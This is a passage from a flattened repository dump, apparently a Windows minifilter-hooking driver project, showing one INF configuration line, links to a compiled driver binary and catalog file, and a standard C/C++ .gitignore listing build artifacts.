98 | Instance1.Flags = 0x0 ; Allow all attachments (no attachment restrictions) 99 | -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/WdfltHook.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook/WdfltHook.sys -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/wdflthook.cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook/wdflthook.cat -------------------------------------------------------------------------------- /gitignore.txt: 
-------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | --------------------------------------------------------------------------------